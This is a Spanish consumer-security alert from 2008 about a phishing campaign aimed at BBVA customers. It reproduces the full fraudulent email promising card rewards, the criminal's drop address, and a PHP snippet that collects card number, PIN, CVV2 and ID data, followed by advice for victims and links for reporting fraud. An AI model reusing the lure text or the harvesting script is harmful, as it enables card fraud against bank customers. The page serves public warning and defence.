Comisión de Seguridad

ir a noticias
Logo de la Asociación de Internautas
Fecha artículo: 2008-09-18 10:49:48 - url artículo: http://seguridad.internautas.org/html/4415.html

Noticias

Phishing bancario que afecta a clientes del BBVA con asunto llamativo y donde descubrimos al ciber-delicuente.

Detectado varios casos de phishing bancario que afecta al BBVA y sus clientes, el procedimiento es el clásico correo electrónico que simula ser enviado por la entidad bancaria y hacer creer al cliente que es una notificación de la entidad para verificar sus datos.

El asunto del correo trampa es: Eres titular de una tarjeta BBVA? Empieza a ganar con BBVA desde 500,00EUR hasta 1.500,00EUR !

Los datos obtenidos son enviados a: asia.europe2z@yahoo.es
Con el siguiente correo electrónico los ciber-delicuentes intentan por medio del uso de ingeniería social y realizar el engaño a los clientes del BBVA:


Subject: Eres titular de una tarjeta BBVA? Empieza a ganar con BBVA desde 500,00EUR hasta 1.500,00EUR !
Date: Thu, 18 Sep 2008
From: BBVA
Reply-To:


Estimado cliente

En fechas proximas , BBVA va lanzar una promocion de descuentos en compras!

Si eres titular de una Tarjeta Visa Oro BBVA que empieza con 494011 pudedes ganar 1.500,00EUR en compras

Si eres titular de otra tarjeta BBVA puedes ganar 500,00EUR en compras :

Todo que tienes que hacer es :

1. Haga click en el siguente enlace para complectar el formulario de 1,500.00EUR o de 500,00EUR

2. El importe de 1,500.00EUR o de 500,00EUR va estar abonado en su Tarjeta como maximo 2-4 dias laborales

Un servicio de BBVA

Haga click aqui para empezar a completar el formulario

Gracias por confiar en BBVA

Departamento de Validación de BBVA.



Si se pulsa sobre los enlaces del correo trampa este nos enviara a una web que suplanta la imagen de la entidad bancaria BBVA y donde no solicita las claves bancarias:






Datos del script que envia los datos al ciberdelicuente:



$aaa="asia.europe2z@yahoo.es";
$tex="Nueva BBVA Num[]";
$msg = "
Nombres y Apellidos : $_POST[name]
Direccion : : $_POST[dir]
Telefono de contacto : $_POST[tel]
Codigo Postal : $_POST[post]
Provincia : $_POST[prov]
Pais : $_POST[pais]
Direccion de correo electronico : $_POST[cor]
Número de tarjeta: $_POST[numtarjeta]
Pin: $_POST[pin]
Vencimiento: $_POST[ven]
Cvv2: $_POST[cvv2]
DNI: $_POST[num_doc]
IP: $iperr
";
/*ip:*/ $ip = $_POST[ip];



Aunque muchos usuarios piensen que en este tipo de trampa es muy conocida, todavía hay miles de internautas y clientes de la banca online que “pican” en este tipo de trampa, cada día son mejores las falsificaciones y los nombres del dominio son muy parecidos al verdadero usado por la entidad bancaria.

Desde la Asociación de Internautas recomendamos que - NO RESPONDAN A ESTE TIPO DE CORREOS , NI PULSEN LOS ENLACES QUE CONTIENEN . Su banco NUNCA le solicitará sus datos privados o sus claves para acceder a su cuenta online.

Los Bancos son depositarios de sus claves y nunca las piden, ni por teléfono, ni por fax ni por correo, ni físicamente es Usted el que debe de solicitarlas en caso de olvidarlas o extraviarlas.


Consejos si usted fue victima de este tipo de engaño,

1.- Actué rápido.

2.- Cambien las claves privadas por unas nuevas.

3.- Notifique lo antes posible la incidencia a su entidad, no espere a mañana llame de inmediato, las entidades bancarias actuaran al instante sobre este tipo de estafas.

4.- Denuncie el fraude a las Fuerzas de Seguridad del Estado.


Como funciona un troyano bancario en el ordenador de una victima:

Troyano bancario y que afecta a clientes de banca en línea española.

http://seguridad.internautas.org/html/4189.html

Análisis del troyano: http://seguridad.internautas.org/html/4185.html

Troyano que roba certificados bancarios: http://seguridad.internautas.org/html/4258.html

Como funciona un troyano bancario en el ordenador de una victima, Internautas Televisión:
http://www.internautas.tv/?tv=100


-Aviso de seguridad del BBVA-

Recuerde que BBVA nunca le solicitará ni por correo electrónico, ni por teléfono ni por SMS que informe de sus claves de BBVA net. Sus claves de BBVA net son secretas y únicamente Vd. debe conocerlas para su utilización exclusiva en la propia BBVA net (www.bbvanet.com).

Aviso de seguridad del BBVA




CASOS Y RECOMENDACIONES SOBRE EL PHISHING

Guía rápida para reconocer páginas web falsas que simulan entidades bancarias.

Guía rápida para conocer los nuevos fraudes que se producen en la red.

Normas de Seguridad para acceder a la banca por internet

Se abre el debate: ¿Podemos prevenir posibles ataques de fraude de phishing bancario?.

Internautas Televisión: Informe phishing 2006 en España.

Internautas Televisión: ROBOS DE CLAVES.

Internautas Televisión: Phishing.

Internautas Televisión: ¿Cuánto cuesta un ataque phishing?

Internautas Televisión: Guía de fraudes en la red.


-Medios de comunicación se hacen eco y alertan a los usuarios del grave peligro del phishing y del scam en nuestro pais.-

Tele Madrid

TVE 1

LE PUEDE PASAR A CUALQUIERA.


SeguridaPymes.es ofrece el indicador Alert-Phishing para sitios web.

INFORME SOBRE LA BANCA ONLINE ¿ES SEGURA? ¿La banca online es vulnerable?

Faq de ayuda sobre phishing;
http://seguridad.internautas.org/html/1/451.html
http://www.seguridadpymes.es/noticia.php?id=5

La Asociación de Internautas cuenta con un servicio operativo desde diciembre de 2004, a disposición de todos aquellos internautas que quieran reportar información sobre este tipo de fraudes Phishing, pueden mandar un correo y adjuntar la información a; phishing@internautas.org

Se estudia el caso y se comunica a las Fuerzas de Seguridad del Estado para cursar la denuncia junto a un comunicado de aviso a la entidad suplantada.


- CONFIANZA EN LÍNEA-

Normas de Seguridad para acceder a la banca por internet

Normas de Seguridad para una clave perfecta en Internet

Programa que te ayuda a Generar Claves Seguras.

Agradecemos a todos los amigos internautas que participan en la campaña Anti-Phising y denunciaron este tipo de fraudes.

SeguridaPymes.es ofrece el indicador Alert-Phishing para sitios web.

----------SEGUIMIENTO DEL PHISHING EN ESPAÑA DESDE 2004---------------

INFORME 2006: El Phishing en España se incrementa un 290% en 2006.

INFORME 2005: BBVA la entidad más atacada por Phising en 2005.

SEGUIMIENTO EN LÍNEA

ALERTA - PHISING

RECOMENDACIONES

Normas de Seguridad para acceder a la banca por internet

Normas de Seguridad para una clave perfecta en Internet

Programa que te ayuda a Generar Claves Seguras.

DENUNCIA
PHISHING
Logos y Marcas propiedad de sus respectivos autores
Se permite la reproducción total o parcial de todos los contenidos siempre que se cite la fuente y se enlace con el original
a excepciòn de los que indique lo contrario
© 1998-2011 Asociación de Internautas.